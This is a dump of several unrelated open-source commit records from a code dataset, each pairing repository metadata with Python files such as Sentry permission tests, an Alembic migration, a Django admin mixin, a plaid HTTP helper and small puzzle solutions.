if using_gzip:
gzipper = gzip.GzipFile(fileobj=StringIO(body))
body = gzipper.read()
gzipper.close()
return body
| apache-2.0 | Python | |
54285887dc96e3d5d98ca4c02df2a04d49ac69f7 | Add TeamPermission tests | alexm92/sentry,TedaLIEz/sentry,JamesMura/sentry,kevinlondon/sentry,BayanGroup/sentry,gg7/sentry,jokey2k/sentry,argonemyth/sentry,hongliang5623/sentry,felixbuenemann/sentry,TedaLIEz/sentry,1tush/sentry,Natim/sentry,JTCunning/sentry,llonchj/sentry,Natim/sentry,imankulov/sentry,vperron/sentry,wong2/sentry,1tush/sentry,BuildingLink/sentry,korealerts1/sentry,songyi199111/sentry,mvaled/sentry,alexm92/sentry,drcapulet/sentry,Natim/sentry,mitsuhiko/sentry,kevinastone/sentry,kevinastone/sentry,mvaled/sentry,fuziontech/sentry,songyi199111/sentry,daevaorn/sentry,pauloschilling/sentry,Kryz/sentry,ewdurbin/sentry,fotinakis/sentry,looker/sentry,BuildingLink/sentry,vperron/sentry,looker/sentry,nicholasserra/sentry,nicholasserra/sentry,mitsuhiko/sentry,ifduyue/sentry,ngonzalvez/sentry,nicholasserra/sentry,mvaled/sentry,daevaorn/sentry,BayanGroup/sentry,ifduyue/sentry,jean/sentry,mvaled/sentry,ifduyue/sentry,hongliang5623/sentry,jean/sentry,looker/sentry,daevaorn/sentry,fotinakis/sentry,pauloschilling/sentry,boneyao/sentry,JamesMura/sentry,JackDanger/sentry,beeftornado/sentry,zenefits/sentry,BuildingLink/sentry,kevinastone/sentry,JamesMura/sentry,daevaorn/sentry,wujuguang/sentry,BuildingLink/sentry,imankulov/sentry,gencer/sentry,jean/sentry,imankulov/sentry,zenefits/sentry,ngonzalvez/sentry,boneyao/sentry,JamesMura/sentry,wujuguang/sentry,ewdurbin/sentry,Kryz/sentry,ifduyue/sentry,1tush/sentry,fotinakis/sentry,kevinlondon/sentry,looker/sentry,mvaled/sentry,mvaled/sentry,jean/sentry,boneyao/sentry,jokey2k/sentry,Kryz/sentry,TedaLIEz/sentry,wong2/sentry,felixbuenemann/sentry,hongliang5623/sentry,jokey2k/sentry,JackDanger/sentry,fuziontech/sentry,gg7/sentry,JamesMura/sentry,pauloschilling/sentry,zenefits/sentry,zenefits/sentry,BuildingLink/sentry,gencer/sentry,korealerts1/sentry,drcapulet/sentry,argonemyth/sentry,gencer/sentry,JTCunning/sentry,gg7/sentry,alexm92/sentry,drcapulet/sentry,jean/sentry,ngonzalvez/sentry,korealerts1/sentry,gencer/sentry,zenefits/sentry,vperron/sentry,kevinlondon/sentry,ewdurbin/sentry,llonchj/sentry,BayanGroup/sentry,JackDanger/sentry,wong2/sentry,beeftornado/sentry,ifduyue/sentry,wujuguang/sentry,llonchj/sentry,fuziontech/sentry,looker/sentry,fotinakis/sentry,gencer/sentry,songyi199111/sentry,felixbuenemann/sentry,JTCunning/sentry,beeftornado/sentry,argonemyth/sentry | tests/sentry/api/bases/test_team.py | tests/sentry/api/bases/test_team.py | from __future__ import absolute_import
from mock import Mock
from sentry.api.bases.team import TeamPermission
from sentry.models import ApiKey, OrganizationMemberType, ProjectKey
from sentry.testutils import TestCase
class TeamPermissionBase(TestCase):
def setUp(self):
self.org = self.create_organization()
self.team = self.create_team(organization=self.org)
super(TeamPermissionBase, self).setUp()
def has_object_perm(self, auth, user, obj, method='GET'):
perm = TeamPermission()
request = Mock()
request.auth = auth
request.user = user
request.method = method
return perm.has_object_permission(request, None, obj)
class TeamPermissionTest(TeamPermissionBase):
def test_regular_user(self):
user = self.create_user()
assert not self.has_object_perm(None, user, self.team)
def test_superuser(self):
user = self.create_user(is_superuser=True)
assert self.has_object_perm(None, user, self.team)
def test_org_member_without_team_access(self):
user = self.create_user()
om = self.create_member(
user=user,
organization=self.org,
type=OrganizationMemberType.MEMBER,
has_global_access=False,
)
assert not self.has_object_perm(None, user, self.team)
def test_org_member_with_global_access(self):
user = self.create_user()
om = self.create_member(
user=user,
organization=self.org,
type=OrganizationMemberType.MEMBER,
has_global_access=True,
)
assert self.has_object_perm(None, user, self.team)
def test_org_member_with_team_access(self):
user = self.create_user()
om = self.create_member(
user=user,
organization=self.org,
type=OrganizationMemberType.MEMBER,
has_global_access=False,
)
om.teams.add(self.team)
assert self.has_object_perm(None, user, self.team)
def test_project_key(self):
key = ProjectKey.objects.create(
project=self.create_project(team=self.team),
)
assert not self.has_object_perm(key, None, self.team)
def test_api_key_with_org_access(self):
key = ApiKey.objects.create(
organization=self.org,
)
assert self.has_object_perm(key, None, self.team)
def test_api_key_without_org_access(self):
key = ApiKey.objects.create(
organization=self.create_organization(),
)
assert not self.has_object_perm(key, None, self.team)
| bsd-3-clause | Python | |
aeabc254a09047a58ea5b5c16fb2c5e7e9008691 | Test generator expressions | alexmojaki/snoop,alexmojaki/snoop | tests/samples/generator_expression.py | tests/samples/generator_expression.py | import snoop
@snoop(depth=2)
def main():
return list(x * 2 for x in [1, 2])
if __name__ == '__main__':
main()
expected_output = """
12:34:56.78 >>> Call to main in File "/path/to_file.py", line 5
12:34:56.78 5 | def main():
12:34:56.78 6 | return list(x * 2 for x in [1, 2])
12:34:56.78 >>> Start generator <genexpr> in File "/path/to_file.py", line 6
12:34:56.78 6 | return list(x * 2 for x in [1, 2])
12:34:56.78 6 | return list(x * 2 for x in [1, 2])
12:34:56.78 .......... Iterating over <tupleiterator object at 0xABC>
12:34:56.78 .......... x = 1
12:34:56.78 <<< Yield value from <genexpr>: 2
12:34:56.78 >>> Re-enter generator <genexpr> in File "/path/to_file.py", line 6
12:34:56.78 6 | return list(x * 2 for x in [1, 2])
12:34:56.78 6 | return list(x * 2 for x in [1, 2])
12:34:56.78 .......... Iterating over <tupleiterator object at 0xABC>
12:34:56.78 .......... x = 2
12:34:56.78 <<< Yield value from <genexpr>: 4
12:34:56.78 >>> Re-enter generator <genexpr> in File "/path/to_file.py", line 6
12:34:56.78 6 | return list(x * 2 for x in [1, 2])
12:34:56.78 6 | return list(x * 2 for x in [1, 2])
12:34:56.78 .......... Iterating over <tupleiterator object at 0xABC>
12:34:56.78 .......... x = 2
12:34:56.78 <<< Return value from <genexpr>: None
12:34:56.78 6 | return list(x * 2 for x in [1, 2])
12:34:56.78 <<< Return value from main: [2, 4]
"""
| mit | Python | |
8e049c956045b3d5cc37db0041e71b637f556408 | add DB migration | JING-TIME/ustc-course,JING-TIME/ustc-course,JING-TIME/ustc-course,JING-TIME/ustc-course,JING-TIME/ustc-course | migrations/versions/2316c9808a5_.py | migrations/versions/2316c9808a5_.py | """empty message
Revision ID: 2316c9808a5
Revises: 26fbbffb991
Create Date: 2015-04-16 13:46:41.849087
"""
# revision identifiers, used by Alembic.
revision = '2316c9808a5'
down_revision = '26fbbffb991'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('courses', sa.Column('homepage', sa.Text(), nullable=True))
op.add_column('teachers', sa.Column('avatar', sa.Integer(), nullable=True))
op.add_column('teachers', sa.Column('homepage', sa.Text(), nullable=True))
op.create_foreign_key(None, 'teachers', 'image_store', ['avatar'], ['id'])
op.add_column('users', sa.Column('homepage', sa.Text(), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('users', 'homepage')
op.drop_constraint(None, 'teachers', type_='foreignkey')
op.drop_column('teachers', 'homepage')
op.drop_column('teachers', 'avatar')
op.drop_column('courses', 'homepage')
### end Alembic commands ###
| agpl-3.0 | Python | |
0ca24ff03f6382c23995f662b678e457a8394140 | Add script to bump symbol versions | agx/libvirt-debian,agx/libvirt-debian,agx/libvirt-debian,agx/libvirt-debian,agx/libvirt-debian | debian/bump-symbols.py | debian/bump-symbols.py | #!/usr/bin/python
#
# Bump symbol versions of libvirt0
# Usage: ./bump-symbol-versions 1.2.16~rc2
import os
import re
import sys
import shutil
import subprocess
#import gbp.git.GitRepository
symbols_file = 'debian/libvirt0.symbols'
symbols_new_file = symbols_file + '.new'
symbols = open(symbols_file)
symbols_new = open('%s.new' % symbols_file, 'w+')
if len(sys.argv) != 2:
print >>sys.stderr, "Need a version"
sys.exit(1)
version = sys.argv[1]
s_version = version.split('~', 1)[0]
for line in symbols.readlines():
m = re.match('(?P<pre>.*LIBVIRT_(?P<admin>ADMIN_)?PRIVATE_)(?P<v>[a-z0-9.]+) ',
line)
if m:
if not m.group('admin'):
symbols_new.write(' *@LIBVIRT_%s %s\n' % (s_version, version))
symbols_new.write("%s%s %s\n" %
(m.group('pre'), s_version, version))
else:
symbols_new.write(line)
symbols.close()
symbols_new.close()
os.unlink(symbols_file)
shutil.move(symbols_new_file, symbols_file)
subprocess.call(['git', 'commit', '-m', 'Bump symbol versions', symbols_file])
| lgpl-2.1 | Python | |
4435eb504b10855088f006456dfface89a4a8798 | create first easy mixin | ebertti/django-admin-easy,ebertti/django-admin-easy | easy/admin/mixin.py | easy/admin/mixin.py | # coding: utf-8
from django.conf.urls import url
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.http.response import HttpResponseRedirect
class MixinEasyViews(object):
def get_urls(self):
urls = super(MixinEasyViews, self).get_urls()
info = self.model._meta.app_label, self.model._meta.model_name
easy_urls = [
url(r'^(?P<pk>.+)/easy/(?P<action>.+)/$', self.admin_site.admin_view(self.easy_object_view),
name='%s_%s_easy' % info),
url(r'^easy/(?P<action>.+)/$', self.admin_site.admin_view(self.easy_list_view),
name='%s_%s_easy' % info),
]
return easy_urls + urls
def easy_object_view(self, request, pk, action):
method_name = 'easy_view_%s' % action
view = getattr(self, method_name, None)
if view:
return view(request, pk)
self.message_user(request, 'Easy view %s not founded' % method_name, messages.ERROR)
info = self.model._meta.app_label, self.model._meta.model_name
redirect = reverse('admin:%s_%s_change' % info, args=(pk,))
return HttpResponseRedirect(redirect)
def easy_list_view(self, request, action):
method_name = 'easy_view_%s' % action
view = getattr(self, method_name, None)
if view:
return view(request)
self.message_user(request, 'Easy view %s not founded' % method_name, messages.ERROR)
info = self.model._meta.app_label, self.model._meta.model_name
redirect = reverse('admin:%s_%s_changelist' % info,)
return HttpResponseRedirect(redirect) | mit | Python | |
27640acedbd945d22db1f26dce75c107c21e988d | Add tests suite for web oriented tags. | TamiaLab/PySkCode | tests/tests_tags/tests_webspecials.py | tests/tests_tags/tests_webspecials.py | """
SkCode web oriented tag test code.
"""
import unittest
from skcode.etree import TreeNode
from skcode.tags import (HorizontalLineTagOptions,
LineBreakTagOptions,
DEFAULT_RECOGNIZED_TAGS)
class HorizontalLineTagTestCase(unittest.TestCase):
""" Tests suite for the horizontal line tag module. """
def test_tag_and_aliases_in_default_recognized_tags_dict(self):
""" Test the presence of the tag and aliases in the dictionary of default recognized tags. """
self.assertIn('hr', DEFAULT_RECOGNIZED_TAGS)
self.assertIsInstance(DEFAULT_RECOGNIZED_TAGS['hr'], HorizontalLineTagOptions)
def test_tag_constant_values(self):
""" Test tag constants. """
opts = HorizontalLineTagOptions()
self.assertFalse(opts.newline_closes)
self.assertFalse(opts.same_tag_closes)
self.assertTrue(opts.standalone)
self.assertTrue(opts.parse_embedded)
self.assertFalse(opts.swallow_trailing_newline)
self.assertFalse(opts.inline)
self.assertTrue(opts.close_inlines)
self.assertFalse(opts.make_paragraphs_here)
def test_render_html(self):
""" Test the ``render_html`` method. """
opts = HorizontalLineTagOptions()
self.assertEqual('<hr>\n', opts.render_html(None, ''))
def test_render_text(self):
""" Test the ``render_text`` method. """
opts = HorizontalLineTagOptions()
self.assertEqual('----------\n', opts.render_text(None, ''))
def test_render_skcode(self):
""" Test the ``render_skcode`` method. """
opts = HorizontalLineTagOptions()
tree_node = TreeNode(None, 'hr', opts)
self.assertEqual('[hr]', opts.render_skcode(tree_node, ''))
class LineBreakTagTestCase(unittest.TestCase):
""" Tests suite for the line break tag module. """
def test_tag_and_aliases_in_default_recognized_tags_dict(self):
""" Test the presence of the tag and aliases in the dictionary of default recognized tags. """
self.assertIn('br', DEFAULT_RECOGNIZED_TAGS)
self.assertIsInstance(DEFAULT_RECOGNIZED_TAGS['br'], LineBreakTagOptions)
def test_tag_constant_values(self):
""" Test tag constants. """
opts = LineBreakTagOptions()
self.assertFalse(opts.newline_closes)
self.assertFalse(opts.same_tag_closes)
self.assertTrue(opts.standalone)
self.assertTrue(opts.parse_embedded)
self.assertFalse(opts.swallow_trailing_newline)
self.assertFalse(opts.inline)
self.assertTrue(opts.close_inlines)
self.assertFalse(opts.make_paragraphs_here)
def test_render_html(self):
""" Test the ``render_html`` method. """
opts = LineBreakTagOptions()
self.assertEqual('<br>\n', opts.render_html(None, ''))
def test_render_text(self):
""" Test the ``render_text`` method. """
opts = LineBreakTagOptions()
self.assertEqual('\n', opts.render_text(None, ''))
def test_render_skcode(self):
""" Test the ``render_skcode`` method. """
opts = LineBreakTagOptions()
tree_node = TreeNode(None, 'br', opts)
self.assertEqual('[br]', opts.render_skcode(tree_node, ''))
| agpl-3.0 | Python | |
a5950853ae7cfe9ac4fce7f297722231feae2f44 | switch if/else per David's review comments | qwil/plaid-python,LawnmowerIO/plaid-python,Affirm/plaid-python,plaid/plaid-python,erikbern/plaid-python | plaid/http.py | plaid/http.py | ##############################################################################
# Helper module that encapsulates the HTTPS request so that it can be used
# with multiple runtimes. PK Mar. 14
##############################################################################
import os
import urllib
# Command line
def _requests_http_request(url, method, data):
import requests
if method.upper() == 'GET':
return requests.get(url, data = data)
elif method.upper() == 'POST':
return requests.post(url, data = data)
elif method.upper() == 'PUT':
return requests.put(url, data = data)
elif method.upper() == 'DELETE':
return requests.delete(url, data = data)
elif method.upper() == 'PATCH':
return requests.patch(url, data = data)
assert False
# Google App Engine
def _urlfetch_http_request(url, method, data):
from google.appengine.api import urlfetch
method = method.upper()
qs = urllib.urlencode(data)
if method == 'POST':
payload = qs
else:
payload = None
url += '?' + qs
response = urlfetch.fetch(url,
follow_redirects = True,
method = method,
payload = payload
)
response.ok = response.status_code >= 200 and response.status_code < 300
return response
_is_appengine = None
def http_request(url, method, data = {}):
global _is_appengine
if _is_appengine is None:
ss = os.environ.get('SERVER_SOFTWARE', None)
_is_appengine = (ss and (ss.startswith('Development/') or ss.startswith('Google App Engine/')))
if _is_appengine:
return _urlfetch_http_request(url, method, data)
else:
return _requests_http_request(url, method, data)
| ##############################################################################
# Helper module that encapsulates the HTTPS request so that it can be used
# with multiple runtimes. PK Mar. 14
##############################################################################
import os
import urllib
# Command line
def _requests_http_request(url, method, data):
import requests
if method.upper() == 'GET':
return requests.get(url, data = data)
elif method.upper() == 'POST':
return requests.post(url, data = data)
elif method.upper() == 'PUT':
return requests.put(url, data = data)
elif method.upper() == 'DELETE':
return requests.delete(url, data = data)
elif method.upper() == 'PATCH':
return requests.patch(url, data = data)
assert False
# Google App Engine
def _urlfetch_http_request(url, method, data):
from google.appengine.api import urlfetch
method = method.upper()
qs = urllib.urlencode(data)
if method == 'POST':
payload = qs
else:
payload = None
url += '?' + qs
response = urlfetch.fetch(url,
follow_redirects = True,
method = method,
payload = payload
)
response.ok = response.status_code >= 200 and response.status_code < 300
return response
_is_appengine = None
def http_request(url, method, data = {}):
global _is_appengine
if _is_appengine is None:
ss = os.environ.get('SERVER_SOFTWARE', None)
_is_appengine = (ss and (ss.startswith('Development/') or ss.startswith('Google App Engine/')))
if not _is_appengine:
return _requests_http_request(url, method, data)
else:
return _urlfetch_http_request(url, method, data)
| mit | Python |
a5c99fe8e37079a2663fe90644d3925d6dc7a5d0 | Add another example that works offline | seleniumbase/SeleniumBase,mdmintz/SeleniumBase,seleniumbase/SeleniumBase,mdmintz/SeleniumBase,mdmintz/SeleniumBase,mdmintz/SeleniumBase,seleniumbase/SeleniumBase,seleniumbase/SeleniumBase | examples/offline_examples/test_request_fixture.py | examples/offline_examples/test_request_fixture.py | import pytest
@pytest.mark.offline
def test_request_fixture(request):
sb = request.getfixturevalue('sb')
sb.open("data:text/html,<p>Hello<br><input></p>")
sb.assert_element("html > body")
sb.assert_text("Hello", "body p")
sb.type("input", "Goodbye")
sb.click("body p")
sb.tearDown()
| mit | Python | |
f31fb6a06c9f0126f43e7b1208502f67f7605d33 | Add the-love-letter-mistery | davide-ceretti/hackerrank.com | the-love-letter-mystery/solution.py | the-love-letter-mystery/solution.py | from math import fabs
def solve(string):
"""
abc -> abb -> aba (2)
abcba (0)
abcd -> abcc -> abcb -> abca -> abba (4)
cba -> bba -> aba (2)
"""
if len(string) == 1:
return True
ords = [ord(each) for each in string]
length = len(ords)
diffs = sum([fabs(ords[i] - ords[length-1-i]) for i in xrange(length/2)])
return int(diffs)
t = raw_input()
for _ in xrange(int(t)):
print solve(raw_input())
| mit | Python | |
01589a78cbe3bcabd116b9943f23ab3e8bc6a158 | Create irrigate.py | Python-IoT/Smart-IoT-Planting-System,Python-IoT/Smart-IoT-Planting-System | device/src/irrigate.py | device/src/irrigate.py | #!/usr/bin/env python
#In this project, I use a servo to simulate the water tap.
#Roating to 90 angle suggest that the water tap is open, and 0 angle means close.
from pyb import Servo
servo=Servo(1) # X1
def irrigate_start():
servo.angle(90)
def irrigate_stop():
servo.angle(0)
| mit | Python | |
a2296ae2165b60ba182d540f729a099183169c92 | Add problem 40, decimal fraction digits | dimkarakostas/project-euler | problem_40.py | problem_40.py | from time import time
def main():
fractional_part = ''
i = 1
while len(fractional_part) < 1000000:
fractional_part += str(i)
i += 1
prod = 1
for i in [1, 10, 100, 1000, 10000, 100000, 1000000]:
prod *= int(fractional_part[i-1])
print 'Product:', prod
if __name__ == '__main__':
t = time()
main()
print 'Time:', time() - t
| mit | Python | |
e9b6a27a423e765033d04801762f9f0356cd992a | Add urls.py ,placeholder for urls mappings in the plots app | ankeshanand/benchmark,ankeshanand/benchmark,ankeshanand/benchmark,ankeshanand/benchmark | plots/urls.py | plots/urls.py | __author__ = 'ankesh'
from django.conf.urls import patterns, url
| bsd-2-clause | Python | |
dc1bcdfed7439e1e00fdcad058fd9acbc1fac466 | add initadmin to management base commands | fiduswriter/fiduswriter,fiduswriter/fiduswriter,fiduswriter/fiduswriter,fiduswriter/fiduswriter | fiduswriter/base/management/commands/initadmin.py | fiduswriter/base/management/commands/initadmin.py | # code adapted by github.com/jobdiogenes from https://github.com/dkarchmer/aws-eb-docker-django/blob/master/authentication/manage
# used to help automation install like in docker.
# Create admins accounts if no users exists.
# Password 'admin' is used unless defined by ADMIN_PASSWORD
from django.conf import settings
from django.core.management.base import BaseCommand
from django.contrib.auth.models import User
from os import getenv
class Command(BaseCommand):
def handle(self, *args, **options):
if User.objects.count() == 0:
for user in settings.ADMINS:
username = user[0].replace(' ', '')
email = user[1]
password = getenv('ADMIN_PASSWORD') if getenv('ADMIN_PASSWORD')!='' else 'admin'
print('Creating account for %s (%s)' % (username, email))
admin = User.objects.create_superuser(username=username, email=email, password=password
admin.is_active = True
admin.is_admin = True
admin.save()
else:
print('Admin accounts can only be initialized if no Accounts exist') | agpl-3.0 | Python | |
dba312802cbf73f54c7cc347d45430ac0d8f016c | add TicketFactory | Christophe31/django-tickets,byteweaver/django-tickets,byteweaver/django-tickets,Christophe31/django-tickets | tickets/tests/factories.py | tickets/tests/factories.py | from django.contrib.auth.models import User
import factory
from tickets.models import Ticket
class UserFactory(factory.Factory):
FACTORY_FOR = User
class TicketFactory(factory.Factory):
FACTORY_FOR = Ticket
creator = factory.LazyAttribute(lambda a: UserFactory())
| bsd-3-clause | Python | |
9d77092729e534b19d75b38dd700df25a009fa49 | Add script to convexify the energies of a conservation tracking JSON model | chaubold/hytra,chaubold/hytra,chaubold/hytra | toolbox/convexify_costs.py | toolbox/convexify_costs.py | import sys
import commentjson as json
import os
import argparse
import numpy as np
def listify(l):
return [[e] for e in l]
def convexify(l):
features = np.array(l)
if features.shape[1] != 1:
raise InvalidArgumentException('This script can only convexify feature vectors with one feature per state!')
bestState = np.argmin(features)
for direction in [-1, 1]:
pos = bestState + direction
previousGradient = 0
while pos >= 0 and pos < features.shape[0]:
newGradient = features[pos] - features[pos-direction]
if abs(newGradient) < abs(previousGradient):
# cost function got too flat, set feature value to match old slope
features[pos] = features[pos-direction] + previousGradient
else:
# all good, continue with new slope
previousGradient = newGradient
pos += direction
return listify(features.flatten())
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Take a json file containing a result to a set of HDF5 events files')
parser.add_argument('--model', required=True, type=str, dest='model_filename',
help='Filename of the json model description')
parser.add_argument('--output', required=True, type=str, dest='result_filename',
help='Filename of the json file containing the model with convexified costs')
args = parser.parse_args()
with open(args.model_filename, 'r') as f:
model = json.load(f)
if not model['settings']['statesShareWeights']:
raise InvalidArgumentException('This script can only convexify feature vectors with shared weights!')
segmentationHypotheses = model['segmentationHypotheses']
for seg in segmentationHypotheses:
for f in ['features', 'appearanceFeatures', 'disappearanceFeatures']:
if f in seg:
seg[f] = convexify(seg[f])
# division features are always convex (is just a line)
linkingHypotheses = model['linkingHypotheses']
for link in linkingHypotheses:
link['features'] = convexify(link['features'])
with open(args.result_filename, 'w') as f:
json.dump(model, f, indent=4, separators=(',', ': ')) | mit | Python | |
9090f48b5abb5c60c8629613724ff7309dee07f5 | Fix restructured text rendering in simple_osmesa.py | michaelaye/vispy,dchilds7/Deysha-Star-Formation,drufat/vispy,ghisvail/vispy,Eric89GXL/vispy,jdreaver/vispy,julienr/vispy,jdreaver/vispy,dchilds7/Deysha-Star-Formation,dchilds7/Deysha-Star-Formation,ghisvail/vispy,michaelaye/vispy,bollu/vispy,inclement/vispy,michaelaye/vispy,julienr/vispy,jdreaver/vispy,julienr/vispy,bollu/vispy,inclement/vispy,drufat/vispy,inclement/vispy,bollu/vispy,QuLogic/vispy,QuLogic/vispy,Eric89GXL/vispy,Eric89GXL/vispy,QuLogic/vispy,ghisvail/vispy,drufat/vispy | examples/offscreen/simple_osmesa.py | examples/offscreen/simple_osmesa.py | # -*- coding: utf-8 -*-
# vispy: testskip
# Copyright (c) 2015, Vispy Development Team.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
"""
This is a simple osmesa example that produce an image of a cube
If you have both osmesa and normal (X) OpenGL installed, execute with
something like the following to pickup the OSMesa libraries::
VISPY_GL_LIB=/opt/osmesa_llvmpipe/lib/libGLESv2.so \
LD_LIBRARY_PATH=/opt/osmesa_llvmpipe/lib/ \
OSMESA_LIBRARY=/opt/osmesa_llvmpipe/lib/libOSMesa.so \
python examples/offscreen/simple_osmesa.py
"""
import vispy
vispy.use(app='osmesa') # noqa
import numpy as np
import vispy.plot as vp
import vispy.io as io
# Check the application correctly picked up osmesa
assert vispy.app.use_app().backend_name == 'osmesa', 'Not using OSMesa'
data = np.load(io.load_data_file('electrophys/iv_curve.npz'))['arr_0']
time = np.arange(0, data.shape[1], 1e-4)
fig = vp.Fig(size=(800, 800), show=False)
x = np.linspace(0, 10, 20)
y = np.cos(x)
line = fig[0, 0].plot((x, y), symbol='o', width=3, title='I/V Curve',
xlabel='Current (pA)', ylabel='Membrane Potential (mV)')
grid = vp.visuals.GridLines(color=(0, 0, 0, 0.5))
grid.set_gl_state('translucent')
fig[0, 0].view.add(grid)
fig.show()
img = fig.render()
io.write_png("osmesa.png", img)
| # -*- coding: utf-8 -*-
# vispy: testskip
# Copyright (c) 2015, Vispy Development Team.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
"""
This is a simple osmesa example that produce an image of a cube
If you have both osmesa and normal (X) OpenGL installed, execute with
something like the following to pickup the OSMesa libraries :
VISPY_GL_LIB=/opt/osmesa_llvmpipe/lib/libGLESv2.so \
LD_LIBRARY_PATH=/opt/osmesa_llvmpipe/lib/ \
OSMESA_LIBRARY=/opt/osmesa_llvmpipe/lib/libOSMesa.so \
python examples/offscreen/simple_osmesa.py
"""
import vispy
vispy.use(app='osmesa') # noqa
import numpy as np
import vispy.plot as vp
import vispy.io as io
# Check the application correctly picked up osmesa
assert vispy.app.use_app().backend_name == 'osmesa', 'Not using OSMesa'
data = np.load(io.load_data_file('electrophys/iv_curve.npz'))['arr_0']
time = np.arange(0, data.shape[1], 1e-4)
fig = vp.Fig(size=(800, 800), show=False)
x = np.linspace(0, 10, 20)
y = np.cos(x)
line = fig[0, 0].plot((x, y), symbol='o', width=3, title='I/V Curve',
xlabel='Current (pA)', ylabel='Membrane Potential (mV)')
grid = vp.visuals.GridLines(color=(0, 0, 0, 0.5))
grid.set_gl_state('translucent')
fig[0, 0].view.add(grid)
fig.show()
img = fig.render()
io.write_png("osmesa.png", img)
| bsd-3-clause | Python |
a951a29062f1fb7946b4d227f6fa0b3b3d5b9a04 | Add a bindings.gyp file for use with node-gyp. | Jonekee/node-serialport,nebrius/node-serialport,Scypho/node-serialport,voodootikigod/node-serialport,pr0duc3r/node-serialport,bmathews/node-serialport,bmathews/node-serialport,mcanthony/node-serialport,tmpvar/node-serialport,Scypho/node-serialport,usefulthink/node-serialport,hybridgroup/node-serialport,alex1818/node-serialport,keyvanfatehi/node-serialport,songshuang00/node-serialport,node-serialport/node-serialport,julianduque/node-serialport,giseburt/node-serialport,ms-iot/node-serialport,kt3k/node-serialport,alex1818/node-serialport,AlexeyPopov/node-serialport,AlexeyPopov/node-serialport,gregfriedland/node-serialport,jacobrosenthal/node-serialport,TooTallNate/node-serialport,voodootikigod/node-serialport,kt3k/node-serialport,EmergingTechnologyAdvisors/node-serialport,ddm/node-serialport,node-serialport/node-serialport,kt3k/node-serialport,bmathews/node-serialport,djchie/node-serialport,tigoe/node-serialport,pr0duc3r/node-serialport,mbedded-ninja/node-serialport,entrylabs/node-serialport,node-serialport/node-serialport,munyirik/node-serialport,mbedded-ninja/node-serialport,usefulthink/node-serialport,SimplyComplexCo/node-serialport,keyvanfatehi/node-serialport,pr0duc3r/node-serialport,djchie/node-serialport,bfjelds/node-serialport,Jonekee/node-serialport,suda/node-serialport,TooTallNate/node-serialport,hybridgroup/node-serialport,node-serialport/node-serialport,Jonekee/node-serialport,julianduque/node-serialport,munyirik/node-serialport,ms-iot/node-serialport,keyvanfatehi/node-serialport,djchie/node-serialport,tmpvar/node-serialport,AlexeyPopov/node-serialport,munyirik/node-serialport,alex1818/node-serialport,aessig/node-serialport,bfjelds/node-serialport,cmaglie/node-serialport,mbedded-ninja/node-serialport,giseburt/node-serialport,tmpvar/node-serialport,SimplyComplexCo/node-serialport,aessig/node-serialport,entrylabs/node-serialport,EmergingTechnologyAdvisors/node-serialport,ms-iot/node-serialport,julianduque/node-serialport,voodootikigod/node-serialport,jacobrosenthal/node-serialport,mcanthony/node-serialport,giseburt/node-serialport,usefulthink/node-serialport,Scypho/node-serialport,bfjelds/node-serialport,mcanthony/node-serialport,songshuang00/node-serialport,keyvanfatehi/node-serialport,prodatakey/node-serialport,rhuehn/node-serialport,ddm/node-serialport,SimplyComplexCo/node-serialport,node-serialport/node-serialport,rodovich/node-serialport,cmaglie/node-serialport,samofab/node-nisa-old,nebrius/node-serialport,gregfriedland/node-serialport,rodovich/node-serialport,usefulthink/node-serialport,hybridgroup/node-serialport,cmaglie/node-serialport,songshuang00/node-serialport,giseburt/node-serialport,ms-iot/node-serialport,nebrius/node-serialport,jacobrosenthal/node-serialport,mcanthony/node-serialport,rhuehn/node-serialport,tmpvar/node-serialport,Pixformance/node-serialport,ddm/node-serialport,Pixformance/node-serialport,prodatakey/node-serialport,mbedded-ninja/node-serialport,voodootikigod/node-serialport,hybridgroup/node-serialport,tigoe/node-serialport,rhuehn/node-serialport,ddm/node-serialport,djchie/node-serialport,entrylabs/node-serialport,munyirik/node-serialport,EmergingTechnologyAdvisors/node-serialport,tigoe/node-serialport,EmergingTechnologyAdvisors/node-serialport,aessig/node-serialport,alex1818/node-serialport,pr0duc3r/node-serialport,gregfriedland/node-serialport,entrylabs/node-serialport,suda/node-serialport,SimplyComplexCo/node-serialport,rodovich/node-serialport,rhuehn/node-serialport,kt3k/node-serialport,TooTallNate/node-serialport,rodovich/node-serialport,Scypho/node-serialport,EmergingTechnologyAdvisors/node-serialport,prodatakey/node-serialport,tigoe/node-serialport,gregfriedland/node-serialport,cmaglie/node-serialport,bfjelds/node-serialport,julianduque/node-serialport,suda/node-serialport,TooTallNate/node-serialport,Pixformance/node-serialport,suda/node-serialport,entrylabs/node-serialport,bmathews/node-serialport,songshuang00/node-serialport,jacobrosenthal/node-serialport,AlexeyPopov/node-serialport,samofab/node-nisa-old,nebrius/node-serialport,samofab/node-nisa-old,aessig/node-serialport,Jonekee/node-serialport,ms-iot/node-serialport,Pixformance/node-serialport,prodatakey/node-serialport | bindings.gyp | bindings.gyp | {
'targets': [
{
'target_name': 'serialport_native',
'sources': [ 'serialport_native/serialport_native.cc' ]
}
]
}
| mit | Python | |
2a9e403d154870e29fa751bf598b5fb9d8662668 | Create send_sensor_data.py | lupyuen/iotapps,lupyuen/iotapps | send_sensor_data.py | send_sensor_data.py | #!/usr/bin/env python
#
# GrovePi Example for using the Grove Temperature Sensor (http://www.seeedstudio.com/wiki/Grove_-_Temperature_Sensor)
#
# The GrovePi connects the Raspberry Pi and Grove sensors. You can learn more about GrovePi here: http://www.dexterindustries.com/GrovePi
#
# Have a question about this example? Ask on the forums here: http://www.dexterindustries.com/forum/?forum=grovepi
#
'''
## License
The MIT License (MIT)
GrovePi for the Raspberry Pi: an open source platform for connecting Grove Sensors to the Raspberry Pi.
Copyright (C) 2015 Dexter Industries
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
